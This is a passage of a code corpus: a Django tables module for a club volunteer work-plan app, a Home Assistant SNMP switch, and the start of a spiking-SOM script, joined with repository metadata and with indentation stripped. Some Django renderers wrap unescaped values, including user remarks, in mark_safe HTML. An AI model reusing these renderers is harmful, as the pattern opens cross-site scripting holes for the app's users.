print "kwargs: ", kwargs
super(DeleteIconColumn, self).__init__(*args, **kwargs)
def render(self, value):
# print value, type(value)
return mark_safe(u'<a href="{}/{}">'
u'<span class="glyphicon glyphicon-trash">'
u'</a>'.format(self.urlBase,
(value)),
)
class ValuedCheckBoxColumn(django_tables2.columns.Column):
"""A checkbox column where a pair of values is expected:
name and whether the box is checked or not.
Control tags (intergeres, not strings!):
-1: show no field
0: unchecked checkbox
1: checked checkbox
"""
def render(self, value):
if value[0] == -1:
return ""
if len(value) > 2:
text = value[2]
else:
text = ""
return mark_safe(u'<input type="checkbox" value="1" name="' +
escape(value[1]) +
'" ' +
("checked" if value[0]==1 else "") +
'/>' + text
)
class IntegerEditColumn(django_tables2.columns.Column):
"""A Column type to allow editing of a single integer value
value should be a tuple: first entry the value to display/edit,
second entry the id/name of the inputbox
"""
def render(self, value):
try:
res = format_html('<input type="" value="{}" name="{}" />',
value[0],
value[1],
)
except Exception as e:
# sometimes, we get a None as value; not sure why and when :-/ ?
# print "Exc2: ", e
# print value
res = ""
# print "IEC: ", res
return res
class TextareaInputColumn (django_tables2.columns.Column):
def render(self, value):
# print "render: ", value, self.__dict__
return mark_safe (u'<input class="textinput textInput" id="id_bemerkungVorstand" maxlength="20" name="bemerkungVorstand" placeholder="Bemerkung Vorstand" value="'
+ escape (value) +
u'" type="text" />'
)
class RequiredAssignedColumn (django_tables2.columns.Column):
"""
A column used by the stundenplan survey table.
Renders both required and assigned numbers in one cell.
"""
def render(self, value):
# print value
try:
r = mark_safe(str(value['required']) +
" / " + str(value['zugeteilt']))
except TypeError:
r = ""
return r
class LinkedColumn(django_tables2.columns.Column):
"""
A column that redners a simple <a href>,
assuming a tuple of values
"""
def render(self, value):
text, link = value
if text:
return mark_safe(u"<a href={0}>{1}</a>".format(link, text))
else:
return "-"
##############################
## Table facotires
##############################
def TableFactory (name, attrs, l, meta={}):
"""takes
- a name for the new django_tables2 class
- a dictoranry with column_name: column_types
- a list of data to be used for the table
return klass
"""
metadict = dict(attrs={"class":"paleblue",
"orderable":"True",
# "width":"90%"
})
metadict.update(meta)
attrs['Meta'] = type('Meta',
(),
metadict,
)
klass = type(name, (django_tables2.Table,), attrs)
t = klass(l)
return t
##############################
def NameTableFactory (name, attrs, l, meta=None,
kontakt=None):
"""
A Factory for django_tables2 with dynamic colums.
Always adds a Nachame, Vorname column to the given attributes
"""
if kontakt:
nameattrs = {'kontakt': KontaktColumn(
accessor=kontakt[0],
verbose_name=kontakt[1],
empty_values=(),
),
}
else:
nameattrs = {'last_name': django_tables2.Column(verbose_name="Nachname"),
'first_name': django_tables2.Column(verbose_name="Vorname"),
}
nameattrs.update(attrs)
# we need to construct the meta field to ensure that the names are shown correctly:
if not meta:
if kontakt:
meta = {'sequence': ('kontakt',
'...',
)}
else:
meta = {'sequence': ('last_name',
'first_name',
'...')}
return TableFactory(name, nameattrs, l,
meta=meta
)
##############################
def StundenplanTableFactory(l, showStunden=True):
"""
A factory to produce a table with aufgaben and uhrzeiten columns.
"""
newattrs = {}
if showStunden:
for i in range(models.Stundenplan.startZeit,
models.Stundenplan.stopZeit+1):
newattrs['u'+str(i)] = RequiredAssignedColumn(
accessor='u'+str(i),
verbose_name=str(i)+'-'+str(i+1)
)
newattrs['aufgabe'] = django_tables2.Column(accessor='aufgabe')
newattrs['gruppe'] = django_tables2.Column(accessor='gruppe',
verbose_name="Aufgabengruppe")
newattrs['gemeldet'] = django_tables2.Column(accessor='gemeldet',
verbose_name="# Meldungen")
newattrs['required'] = django_tables2.Column(accessor='required',
verbose_name="# Anforderungen")
newattrs['zugeteilt'] = django_tables2.Column(accessor='zugeteilt',
verbose_name ="# Zuteilungen")
newattrs['editlink'] = django_tables2.Column(accessor="editlink",
verbose_name="Zuteilen")
newattrs['stundenplanlink'] = django_tables2.Column(accessor="stundenplanlink",
verbose_name="Stundenplan")
t = TableFactory ("Stundenplan",
newattrs, l,
meta = {'sequence': ('aufgabe', 'gruppe', # 'id',
'editlink', 'stundenplanlink',
'required', 'gemeldet', 'zugeteilt',
'...',
)})
return t
def StundenplanEditFactory(l, aufgabe):
"""
Produce a table with persons as row, uhrzeiten as columns.
Checkboxes in the uhrzeit columns.
"""
newattrs = {}
# valus obtained from views/StundenplaeneEdit:
newattrs['anzahl'] = IntegerEditColumn(accessor='anzahl',
verbose_name="Anzahl ZUSÄTZLICHE Helfer",
empty_values=(),)
for i in range(models.Stundenplan.startZeit,
models.Stundenplan.stopZeit+1):
# print '----- ', i
try:
benoetigt = aufgabe.stundenplan_set.filter(uhrzeit__exact=i)[0].anzahl
# benoetigt = aufgabe.benoetigte_Anzahl(i)
except Exception as e:
print "eX: ", e
benoetigt = 0
# print benoetigt
zugewiesen = sum([z.zusatzhelfer + 1
for z in aufgabe.zuteilung_set.filter(stundenzuteilung__uhrzeit=i)])
# print zugewiesen
newattrs['u'+str(i)] = ValuedCheckBoxColumn(accessor='u'+str(i),
# verbose_name=str(i)+'-'+str(i+1),
verbose_name=mark_safe('{} - {}'
'<span style="font-weight:normal">'
'<br> ({} / {})'
'</span>'.format(
i, i+1, benoetigt, zugewiesen),
))
return NameTableFactory("StundenplanEdit",
newattrs, l,
meta={'sequence': ('last_name',
'first_name',
'anzahl',
'...')}
)
##############################
class AufgabenTable (django_tables2.Table):
verantwortlicher = KontaktColumn(
accessor="verantwortlich",
verbose_name="Verantwortlicher")
meldungen = django_tables2.Column(
verbose_name="Vorliegende Meldungen",
empty_values=(),
orderable=False,
)
zuteilungen = django_tables2.Column(
verbose_name="Erfolgte Zuteilungen",
empty_values=(),
orderable=False,
)
quickmeldung = django_tables2.Column(
verbose_name="Quickmeldung",
empty_values=(),
orderable=False,
)
def render_meldungen(self, record):
# return record.meldung_set.count()
return record.numMeldungen()
def render_zuteilungen(self, record):
return record.zuteilung_set.count()
def render_quickmeldung(self, record):
user = self.context["request"].user
try:
meldung = record.meldung_set.get(melder=user)
meldung_exists = (meldung.bemerkung != models.Meldung.MODELDEFAULTS['bemerkung'] or
meldung.prefMitglied != models.Meldung.MODELDEFAULTS['prefMitglied'])
except:
meldung_exists = False
return mark_safe('<a href="{}"> <i class="fa fa-hand-o-up fa-fw"></i></a> {}'.format(
reverse('arbeitsplan-quickmeldung', args=[record.id]),
'<i class="fa fa-check fa-fw"></i>' if meldung_exists else "",
))
class Meta:
model = models.Aufgabe
attrs = {"class": "paleblue"}
# fields=("aufgabe", "datum",
# django_tables2.A("verantwortlich.last_name"),
# "gruppe", "anzahl", "bemerkung")
fields = ("gruppe", "aufgabe", "datum",
"stunden",
"anzahl",
"bemerkung",
"verantwortlicher",
"quickmeldung",
)
exclude = ("meldungen", "zuteilungen", )
class AufgabenTableTeamlead (django_tables2.Table):
verantwortlicher = KontaktColumn(
accessor="verantwortlich",
verbose_name="Verantwortlicher")
meldungen = django_tables2.Column(
verbose_name="Vorliegende Meldungen",
empty_values=(),
orderable=False,
)
zuteilungen = django_tables2.Column(
verbose_name="Erfolgte Zuteilungen",
empty_values=(),
orderable=False,
)
def render_meldungen(self, record):
# return record.meldung_set.count()
return record.numMeldungen()
def render_zuteilungen(self, record):
return record.zuteilung_set.count()
class Meta:
model = models.Aufgabe
attrs = {"class": "paleblue"}
# fields=("aufgabe", "datum",
# django_tables2.A("verantwortlich.last_name"),
# "gruppe", "anzahl", "bemerkung")
fields = ("gruppe", "aufgabe", "datum",
"stunden",
"anzahl",
"bemerkung",
"verantwortlicher",
)
exclude = ("meldungen", "zuteilungen", )
class AufgabenTableVorstand(django_tables2.Table):
verantwortlicher = KontaktColumn(
accessor="verantwortlich",
verbose_name="Verantwortlicher")
id = django_tables2.LinkColumn(
'arbeitsplan-aufgabenEdit',
args=[A('pk')],
verbose_name="Editieren/ Löschen")
meldungen = django_tables2.Column(
verbose_name="Vorliegende Meldungen",
empty_values=(),
orderable=False,
)
zuteilungen = django_tables2.Column(
verbose_name="Erfolgte Zuteilungen",
empty_values=(),
orderable=False,
)
fehlende_zuteilungen = django_tables2.Column(
verbose_name="Noch offene Zuteilungen",
empty_values=(),
orderable=False,
)
def render_meldungen(self, record):
# return record.meldung_set.count()
return record.numMeldungen()
def render_zuteilungen(self, record):
return record.zuteilung_set.count()
def render_fehlende_zuteilungen(self, record):
return record.anzahl - record.zuteilung_set.count()
class Meta:
model = models.Aufgabe
attrs = {"class": "paleblue"}
# fields=("aufgabe", "datum",
# django_tables2.A("verantwortlich.last_name"),
# "gruppe", "anzahl", "bemerkung")
fields = ("id",
"gruppe", "aufgabe", "datum",
"stunden",
"anzahl",
"meldungen",
"zuteilungen", "fehlende_zuteilungen",
"bemerkung",
'verantwortlicher',
)
# TODO: anzahl muss man wahrscheinlich
# auf die ANzahl FREIE Plaetze umrechnen!?!?
class AufgabengruppeTable(django_tables2.Table):
id = django_tables2.LinkColumn('arbeitsplan-aufgabengruppeEdit',
args=[A('pk')],
verbose_name="Editieren",
)
verantwortlich = KontaktColumn()
class Meta:
model = models.Aufgabengruppe
attrs = {"class": "paleblue"}
fields = ('gruppe', 'verantwortlich', 'bemerkung', 'id', )
# exclude = ('id',)
########################
class StundenplanTable (django_tables2.Table):
id = django_tables2.LinkColumn ('arbeitsplan-stundenplaeneEdit',
args=[A('id'),],
verbose_name="Stundenplan editieren")
aufgabe = django_tables2.Column (accessor='aufgabe')
gruppe = django_tables2.Column (accessor='gruppe__gruppe', verbose_name="Aufgabengruppe")
u0 = django_tables2.Column (accessor='u0', verbose_name='0-1')
u1 = django_tables2.Column (accessor='u1', verbose_name='0-1')
u2 = django_tables2.Column (accessor='u2', verbose_name='0-1')
u3 = django_tables2.Column (accessor='u3', verbose_name='0-1')
u4 = django_tables2.Column (accessor='u4', verbose_name='0-1')
u5 = django_tables2.Column (accessor='u5', verbose_name='0-1')
u6 = django_tables2.Column (accessor='u6', verbose_name='0-1')
u7 = django_tables2.Column (accessor='u7', verbose_name='0-1')
u8 = django_tables2.Column (accessor='u8', verbose_name='0-1')
u9 = django_tables2.Column (accessor='u9', verbose_name='0-1')
u10 = django_tables2.Column (accessor='u10', verbose_name='0-1')
u11 = django_tables2.Column (accessor='u11', verbose_name='0-1')
u12 = django_tables2.Column (accessor='u12', verbose_name='0-1')
u13 = django_tables2.Column (accessor='u13', verbose_name='0-1')
u14 = django_tables2.Column (accessor='u14', verbose_name='0-1')
u15 = django_tables2.Column (accessor='u15', verbose_name='0-1')
u16 = django_tables2.Column (accessor='u16', verbose_name='0-1')
u17 = django_tables2.Column (accessor='u17', verbose_name='0-1')
class Meta:
# model = models.Aufgabe
attrs = {"class": "paleblue"}
# fields = ('aufgabe', 'gruppe', 'id', )
##############################
class ZuteilungTable(django_tables2.Table):
## verantwortlicher = django_tables2.Column(
## accessor="aufgabe.verantwortlich.last_name",
## verbose_name="Verantwortlicher")
verantwortlicher = KontaktColumn(
accessor="aufgabe.kontakt",
verbose_name="Verantwortlicher",
orderable=False,
)
datum = django_tables2.Column(accessor="aufgabe.datum",
verbose_name="Datum")
studenString = django_tables2.Column(
verbose_name="Zeiten",
accessor='stundenString',
)
class Meta:
model = models.Zuteilung
attrs = {"class": "paleblue"}
fields = ("aufgabe", 'verantwortlicher', 'datum',
# 'stundenString',
)
class ZuteilungTableVorstand(django_tables2.Table):
verantwortlicher = KontaktColumn(
accessor="aufgabe.verantwortlich",
verbose_name="Verantwortlicher")
datum = django_tables2.Column(
accessor="aufgabe.datum",
verbose_name="Datum")
ausfuehrer = KontaktColumn(accessor="ausfuehrer",
verbose_name="Ausführer")
deleteColumn = DeleteIconColumn(
urlBase ='/arbeitsplan/zuteilungDelete',
accessor="id",
verbose_name="Löschen")
class Meta:
model = models.Zuteilung
attrs = {"class": "paleblue"}
fields = ("aufgabe", 'verantwortlicher',
'datum', 'ausfuehrer',
'deleteColumn')
##############################
class MeldungListeTable(django_tables2.Table):
"""A table to only display all Meldungen of a user.
"""
aufgabenGruppe = django_tables2.Column(accessor="aufgabe.gruppe.gruppe",
verbose_name="Aufgabengruppe")
aufgabeName = django_tables2.Column(accessor="aufgabe.aufgabe",
verbose_name="Aufgabe")
aufgabenDatum = django_tables2.Column(accessor="aufgabe.datum",
verbose_name="Datum")
class Meta:
model = models.Meldung
attrs = {"class": "paleblue"}
fields = ("aufgabenGruppe",
"aufgabeName",
"aufgabenDatum",
"prefMitglied",
"bemerkung",
)
exclude = ("id", "erstellt", "veraendert",
"prefVorstand", "bemerkungVorstand",
)
class MeldungTable(RadioButtonTable):
"""A table to edit Meldungen.
"""
# id = django_tables2.Column ()
aufgabe = django_tables2.Column(accessor="aufgabe",
verbose_name="Aufgabe")
gruppe = django_tables2.Column(accessor="gruppe",
verbose_name="Aufgabengruppe")
datum = django_tables2.Column(accessor="datum",
verbose_name="Datum")
stunden = django_tables2.Column(accessor="stunden",
verbose_name="Umfang (h)")
prefMitglied = django_tables2.Column(accessor="prefMitglied",
verbose_name="Vorlieben",
empty_values=(),
)
bemerkung = django_tables2.Column(accessor="bemerkung",
verbose_name="Bemerkung",
empty_values=(),
)
anzahl = django_tables2.Column(
verbose_name="Benötigte Helfer",
empty_values=(),
)
meldungen = django_tables2.Column(
verbose_name="Vorliegende Meldungen",
empty_values=(),
)
zuteilungen = django_tables2.Column(
verbose_name="Erfolgte Zuteilungen",
empty_values=(),
)
fehlende_zuteilungen = django_tables2.Column(
verbose_name="Noch offene Zuteilungen",
empty_values=(),
)
def render_aufgabe(self, value, record):
aufgabe = record['aufgabeObjekt']
tooltext = mark_safe(u'Verantwortlicher: {0} {1}{2}'.format(
aufgabe.verantwortlich.first_name,
aufgabe.verantwortlich.last_name,
u', Bemerkung: {0}'.format(
aufgabe.bemerkung) if aufgabe.bemerkung else '',
))
tmp = mark_safe(
u'<div class="tooltip-demo">'
'<a href="{0}"'
'data-toggle="tooltip"'
'title="{2}"'
'>{1}</a></div>'.format(
'#',
value,
tooltext,
)
)
return tmp
def render_prefMitglied(self, value, record):
return self.render_radio(
choices=models.Meldung.PRAEFERENZ,
buttontexts=models.Meldung.PRAEFERENZButtons,
fieldname="prefMitglied",
record=record,
)
def render_bemerkung(self, value, record, bound_row):
# print record
# print bound_row
tmp = format_html(
u"""<textarea class="textinput textInput"
id="id_bemerkung_{0}" name="bemerkung_{0}"
placeholder="Bemerkung eingeben" rows=6>{1}</textarea>""",
str(record['id']),
record['bemerkung'] if record['bemerkung'] else ""
)
return tmp
class Meta:
# model = models.Aufgabe
attrs = {"class": "paleblue"}
fields = ('gruppe', 'aufgabe', 'datum',
'stunden',
'anzahl',
"meldungen",
'bemerkung',
'prefMitglied')
exclude = ("fehlende_zuteilungen", 'zuteilungen')
class MeldungTableVorstand (RadioButtonTable):
aufgabe = django_tables2.Column(accessor="aufgabe",
verbose_name="Aufgabe")
gruppe = django_tables2.Column(accessor="aufgabe.gruppe",
verbose_name="Aufgabengruppe")
datum = django_tables2.Column(accessor="aufgabe.datum",
verbose_name="Datum")
stunden = django_tables2.Column(accessor="aufgabe.stunden",
verbose_name="Umfang (h)")
prefMitglied = django_tables2.Column(accessor="prefMitglied",
verbose_name="Vorlieben Melder",
empty_values=(),
)
bemerkung = django_tables2.Column(accessor="bemerkung",
verbose_name="Bemerkung Melder",
empty_values=(),
)
## melder_last = django_tables2.Column (accessor="melder.last_name",
## verbose_name="Melder Nachname")
## melder_first = django_tables2.Column (accessor="melder.first_name",
## verbose_name="Melder Vorname")
melder = KontaktColumn(accessor="melder",
verbose_name="Melder",
# order_by=("melder.last_name", "melder.first_name"),
)
## bemerkungVorstand = django_tables2.Column (accessor="bemerkungVorstand",
## verbose_name="Bemerkung Vorstand",
## empty_values=(),
## )
bemerkungVorstand = django_tables2.Column(
empty_values=(),
verbose_name="Bemerkungen des Vorstandes")
prefVorstand = django_tables2.Column(
accessor="prefVorstand",
verbose_name="Vorlieben des Vorstandes",
empty_values=(),
)
def render_prefVorstand(self, value, record):
return self.render_radio(
choices=models.Meldung.PRAEFERENZ,
buttontexts=models.Meldung.PRAEFERENZButtons,
fieldname="prefVorstand",
record=record)
def render_bemerkungVorstand (self, value, record):
tmp = format_html (u'<textarea class="textinput textInput" id="id_bemerkungVorstand_{0}" name="bemerkungVorstand_{0}" placeholder="Bemerkung Vorstand" rows=6>{1}</textarea>',
str(record.id),
record.bemerkungVorstand if record.bemerkungVorstand else ""
)
return tmp
class Meta(MeldungTable.Meta):
model = models.Meldung
fields = ('gruppe', 'aufgabe', 'datum', 'stunden',
# 'melder_last', 'melder_first',
'melder',
'bemerkung', 'prefMitglied',
'bemerkungVorstand', 'prefVorstand')
exclude = ('melder_last', 'melder_first',)
##############################
def SaldenTableFactory (l):
attrs = {}
for s in models.Leistung.STATUS:
attrs[s[0]] = LinkedColumn(verbose_name='Leistungs- angabe ' + s[1] + ' (h)')
attrs['zugeteilt'] = LinkedColumn(verbose_name="Zugeteilt insgesamt (h)")
attrs['past'] = django_tables2.Column(
verbose_name="Zuteilungen vergangener Aufgaben (h)")
attrs['future'] = django_tables2.Column(
verbose_name="Zuteilungen zukünftiger Aufgaben (h)")
attrs['nodate'] = django_tables2.Column(
verbose_name="Zuteilungen Aufgaben ohne Datum (h)")
attrs['arbeitslast'] = django_tables2.Column(
verbose_name="Arbeitslast",
accessor="user.mitglied.arbeitslast")
t = NameTableFactory("salden", attrs, l,
kontakt=('user', 'Mitglied'),
meta={'sequence': ('kontakt',
## 'last_name',
## 'first_name',
'arbeitslast',
'zugeteilt',
'past',
'future',
'nodate',
'...')
})
return t
##############################
def ZuteilungsTableFactory (tuple):
l, aufgabenQs = tuple
attrs = {}
attrs['zugeteilt'] = django_tables2.Column(verbose_name=
"Bereits zugeteilt (h)")
attrs['offen'] = django_tables2.Column(verbose_name=
"Noch zuzuteilen (h)")
for a in aufgabenQs:
tag = (unicodedata.normalize('NFKD',
a.aufgabe).encode('ASCII', 'ignore')
)
attrs[tag] = ValuedCheckBoxColumn(
verbose_name=mark_safe((u'<a href="{}">{}</a>, {}h'
'<span style="font-weight:normal">'
u'<br>({})'
u'<br>Benötigt: {}'
u'<br>Zugeteilt: {}'
u'{}'
'</span>'
.format(reverse('arbeitsplan-aufgabenEdit',
args=(a.id,)),
a.aufgabe,
a.stunden,
a.gruppe,
a.anzahl,
a.zuteilung_set.count(),
# the following expression is the same as appears in
# the ZuteilungUebersichtView
# TODO: perhaps move that to class aufgabe, to produce an edit link
# to its stundenplan if it exists?
('<br>' + mark_safe(u'<a href="{0}">Stundenplan</a>'
.format(reverse ('arbeitsplan-stundenplaeneEdit',
args=(a.id,)),
))
if a.has_Stundenplan()
else ''
) + (u"<br><b>UNVOLLSTÄNDIG</b>"
if not a.stundenplan_complete()
else "<br>ok" )
))),
orderable=False)
# TODO: in verbose_name hier noch Anzahl benötigt, anzahl zugeteilt eintragen
t = NameTableFactory('ZuteilungsTable', attrs, l,
kontakt=('mitglied', 'Mitglied'))
return t
##############################
class LeistungTable(django_tables2.Table):
"""
Show the Leistungen of an individual member.
"""
## melder_last = django_tables2.Column (accessor="melder.last_name",
## verbose_name="Melder Nachname")
## melder_first = django_tables2.Column (accessor="melder.first_name",
## verbose_name="Melder Vorname")
aufgabe = django_tables2.Column(accessor="aufgabe.aufgabe",
verbose_name="Aufgabe")
id = django_tables2.LinkColumn('arbeitsplan-leistungDelete',
args=[A('pk')],
verbose_name="Zurückziehen?")
def render_id(self, record):
if ((record.status == models.Leistung.ACK) or
(record.status == models.Leistung.NEG)):
return "---"
else:
return mark_safe(u'<a href="{}">Zurückziehen</a>'.format(
reverse('arbeitsplan-leistungDelete', args=[record.id])
))
class Meta:
model = models.Leistung
attrs = {"class": "paleblue"}
fields = ( # 'melder_last', 'melder_first',
'aufgabe',
'id',
'wann', 'zeit',
'status',
'bemerkung', 'bemerkungVorstand')
class LeistungBearbeitenTable (RadioButtonTable):
def render_bemerkungVorstand (value, bound_row):
tmp = format_html (u'<textarea class="textinput textInput" id="id_bermerkungVorstand_{0}" name="bemerkungVorstand_{0}" placeholder="Bemerkung Vorstand" rows=6>{1}</textarea>',
str(bound_row._record.id),
bound_row._record.bemerkungVorstand,
)
return tmp
def render_status (self, value, bound_row):
return self.render_radio(bound_row=bound_row,
choices=models.Leistung.STATUS,
buttontexts=models.Leistung.STATUSButtons,
fieldname="status")
bemerkungVorstand = django_tables2.Column(empty_values=(),
verbose_name = "Bemerkungen des Vorstandes")
melder = KontaktColumn()
class Meta:
model = models.Leistung
attrs = {"class": "paleblue"}
exclude = ("erstellt", "veraendert", 'id', 'benachrichtigt')
sequence = ('melder', 'aufgabe', 'wann', 'zeit',
'bemerkung', 'status', 'bemerkungVorstand')
class BaseEmailTable (RadioButtonTable):
anmerkung = django_tables2.Column(empty_values=(),
verbose_name="Individuelle Anmerkung",
)
sendit = django_tables2.Column(verbose_name="Senden?",
accessor="sendit",
orderable=False,
empty_values=(),
)
def render_sendit(value, bound_row):
tmp = format_html(u'<div class="checkbox"> <input name="sendit_{0}" type="checkbox" {1}></div>',
str(bound_row._record.id),
"checked" if bound_row._record.sendit else "",
)
return tmp
def render_anmerkung(value, bound_row):
tmp = format_html (u'<textarea class="textinput textInput" id="id_anmerkung_{0}"'
' name="anmerkung_{0}" placeholder="Individuelle Anmerkung"'
' rows=4>{1}</textarea>',
str(bound_row._record.id),
bound_row._record.anmerkung,
)
return tmp
class LeistungEmailTable(BaseEmailTable):
# a purely computed field:
schonbenachrichtigt = django_tables2.Column (verbose_name="Schon benachrichtigt?",
orderable=False,
empty_values=(),
)
def render_schonbenachrichtigt(value, bound_row):
return ("Ja"
if (bound_row._record.veraendert <
bound_row._record.benachrichtigt)
else "Nein")
melder = KontaktColumn()
class Meta:
model = models.Leistung
attrs = {"class": "paleblue"}
exclude = ("erstellt", "veraendert", 'id', 'benachrichtigt')
sequence = ('melder', 'aufgabe', 'wann', 'zeit',
'bemerkung', 'status', 'bemerkungVorstand',
'schonbenachrichtigt',
'anmerkung', 'sendit'
)
class ZuteilungEmailTable(BaseEmailTable):
user = KontaktColumn(verbose_name="Mitglied")
zuteilungBenachrichtigungNoetig = django_tables2.Column(verbose_name="Nötig?",
orderable=False,
empty_values=(),
)
def render_zuteilungBenachrichtigungNoetig(value, bound_row):
return ("Ja"
if bound_row._record.zuteilungBenachrichtigungNoetig
else "Nein")
class Meta:
model = models.Mitglied
attrs = {"class": "paleblue"}
exclude = ('id',
'mitgliedsnummer',
'zustimmungsDatum',
'geburtsdatum',
'strasse',
'plz',
'gender',
'ort',
'erstbenachrichtigt',
'festnetz',
'mobil',
)
sequence = ('user',
'zuteilungsbenachrichtigung',
'zuteilungBenachrichtigungNoetig',
'anmerkung', 'sendit',
)
class MeldungsAufforderungsEmailTable(BaseEmailTable):
user = KontaktColumn(verbose_name="Mitglied")
numMeldungen = django_tables2.Column(verbose_name="# Meldungen",
orderable=False,
empty_values=(),
)
numZuteilungen = django_tables2.Column(verbose_name="# Zuteilungen",
orderable=False,
empty_values=(),
)
stundenZuteilungen = django_tables2.Column(verbose_name="Zuteilungen (Stunden)",
orderable=False,
empty_values=(),
)
def render_numMeldungen(value, bound_row):
return (bound_row._record.gemeldeteAnzahlAufgaben())
def render_numZuteilungen(value, bound_row):
return (bound_row._record.zugeteilteAufgaben())
def render_stundenZuteilungen(value, bound_row):
return (bound_row._record.zugeteilteStunden())
class Meta:
model = models.Mitglied
attrs = {"class": "paleblue"}
exclude = ('id',
'mitgliedsnummer',
'zustimmungsDatum',
'geburtsdatum',
'strasse',
'plz',
'gender',
'ort',
'erstbenachrichtigt',
'festnetz',
'mobil',
'zuteilungsbenachrichtigung',
'zuteilungBenachrichtigungNoetig',
)
sequence = ('user',
'numMeldungen',
'numZuteilungen',
'stundenZuteilungen',
'anmerkung', 'sendit',
)
class ImpersonateTable(django_tables2.Table):
## first_name = django_tables2.Column (accessor="user.first_name")
## last_name = django_tables2.Column (accessor="user.last_name")
mitgliedsnummer = django_tables2.Column(accessor="mitglied.mitgliedsnummer")
id = django_tables2.LinkColumn('impersonate-start',
args=[A('pk')],
verbose_name="Nutzer darstellen",
)
class Meta:
model = User
attrs = {"class": "paleblue"}
fields = ('first_name',
'last_name',
'mitgliedsnummer',
'id',
)
| apache-2.0 | -1,148,436,846,957,183,600 | 33.7663 | 184 | 0.480138 | false |
stefan-jonasson/home-assistant | homeassistant/components/switch/snmp.py | 2 | 4667 | """
Support for SNMP enabled switch.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/switch.snmp/
"""
import logging
import voluptuous as vol
from homeassistant.components.switch import (SwitchDevice, PLATFORM_SCHEMA)
from homeassistant.const import (
CONF_HOST, CONF_NAME, CONF_PORT, CONF_PAYLOAD_ON, CONF_PAYLOAD_OFF)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['pysnmp==4.4.1']
_LOGGER = logging.getLogger(__name__)
CONF_BASEOID = 'baseoid'
CONF_COMMUNITY = 'community'
CONF_VERSION = 'version'
DEFAULT_NAME = 'SNMP Switch'
DEFAULT_HOST = 'localhost'
DEFAULT_PORT = '161'
DEFAULT_COMMUNITY = 'private'
DEFAULT_VERSION = '1'
DEFAULT_PAYLOAD_ON = 1
DEFAULT_PAYLOAD_OFF = 0
SNMP_VERSIONS = {
'1': 0,
'2c': 1
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_BASEOID): cv.string,
vol.Optional(CONF_COMMUNITY, default=DEFAULT_COMMUNITY): cv.string,
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PAYLOAD_OFF, default=DEFAULT_PAYLOAD_OFF): cv.string,
vol.Optional(CONF_PAYLOAD_ON, default=DEFAULT_PAYLOAD_ON): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_VERSION, default=DEFAULT_VERSION): vol.In(SNMP_VERSIONS),
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the SNMP switch."""
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
port = config.get(CONF_PORT)
community = config.get(CONF_COMMUNITY)
baseoid = config.get(CONF_BASEOID)
version = config.get(CONF_VERSION)
payload_on = config.get(CONF_PAYLOAD_ON)
payload_off = config.get(CONF_PAYLOAD_OFF)
add_devices(
[SnmpSwitch(name, host, port, community, baseoid, version, payload_on,
payload_off)], True)
class SnmpSwitch(SwitchDevice):
"""Represents a SNMP switch."""
def __init__(self, name, host, port, community,
baseoid, version, payload_on, payload_off):
"""Initialize the switch."""
self._name = name
self._host = host
self._port = port
self._community = community
self._baseoid = baseoid
self._version = SNMP_VERSIONS[version]
self._state = None
self._payload_on = payload_on
self._payload_off = payload_off
def turn_on(self):
"""Turn on the switch."""
from pyasn1.type.univ import (Integer)
self._set(Integer(self._payload_on))
def turn_off(self):
"""Turn off the switch."""
from pyasn1.type.univ import (Integer)
self._set(Integer(self._payload_off))
def update(self):
"""Update the state."""
from pysnmp.hlapi import (
getCmd, CommunityData, SnmpEngine, UdpTransportTarget, ContextData,
ObjectType, ObjectIdentity)
from pyasn1.type.univ import (Integer)
request = getCmd(
SnmpEngine(),
CommunityData(self._community, mpModel=self._version),
UdpTransportTarget((self._host, self._port)),
ContextData(),
ObjectType(ObjectIdentity(self._baseoid))
)
errindication, errstatus, errindex, restable = next(request)
if errindication:
_LOGGER.error("SNMP error: %s", errindication)
elif errstatus:
_LOGGER.error("SNMP error: %s at %s", errstatus.prettyPrint(),
errindex and restable[-1][int(errindex) - 1] or '?')
else:
for resrow in restable:
if resrow[-1] == Integer(self._payload_on):
self._state = True
elif resrow[-1] == Integer(self._payload_off):
self._state = False
else:
self._state = None
@property
def name(self):
"""Return the switch's name."""
return self._name
@property
def is_on(self):
"""Return true if switch is on; False if off. None if unknown."""
return self._state
def _set(self, value):
from pysnmp.hlapi import (
setCmd, CommunityData, SnmpEngine, UdpTransportTarget, ContextData,
ObjectType, ObjectIdentity)
request = setCmd(
SnmpEngine(),
CommunityData(self._community, mpModel=self._version),
UdpTransportTarget((self._host, self._port)),
ContextData(),
ObjectType(ObjectIdentity(self._baseoid), value)
)
next(request)
| mit | 5,310,518,417,148,485,000 | 30.533784 | 79 | 0.620956 | false |
ogvalt/saturn | spiking_som.py | 1 | 18544 |
from brian2 import *
from pyqtgraph.Qt import QtGui, QtCore
import numpy as np
import pyqtgraph as pg
import matplotlib.pyplot as plt
from dataset import ArtificialDataSet
class ReceptiveField:
# Parameter that used in standard deviation definition
gamma = 1.5
def __init__(self, bank_size=10, I_min=0.0, I_max=1.0):
self.bank_size = bank_size
self.field_mu = np.array([(I_min + ((2 * i - 2) / 2) * ((I_max - I_min) / (bank_size - 1)))
for i in range(1, bank_size + 1)])
self.field_sigma = (1.0 / self.gamma) * (I_max - I_min)
def float_to_membrane_potential(self, input_vector):
try:
input_vector = input_vector.reshape((input_vector.shape[0], 1))
except Exception as exc:
print("Exception: {0}\nObject shape: {1}".format(repr(exc), input_vector.shape))
exit(1)
temp = np.exp(-((input_vector - self.field_mu) ** 2) / (2 * self.field_sigma * self.field_sigma)) / \
(np.sqrt(2 * np.pi) * self.field_sigma)
temp += np.exp(-((input_vector - 1 - self.field_mu) ** 2) / (2 * self.field_sigma * self.field_sigma)) / \
(np.sqrt(2 * np.pi) * self.field_sigma)
temp += np.exp(-((input_vector + 1 - self.field_mu) ** 2) / (2 * self.field_sigma * self.field_sigma)) / \
(np.sqrt(2 * np.pi) * self.field_sigma)
return temp
if __name__ == "__main__":
prefs.codegen.target = 'numpy'
np.random.seed(1)
seed(1)
np.set_printoptions(suppress=True)
bank_size = 10
diff_method = 'euler'
# inputs = np.random.rand(3)
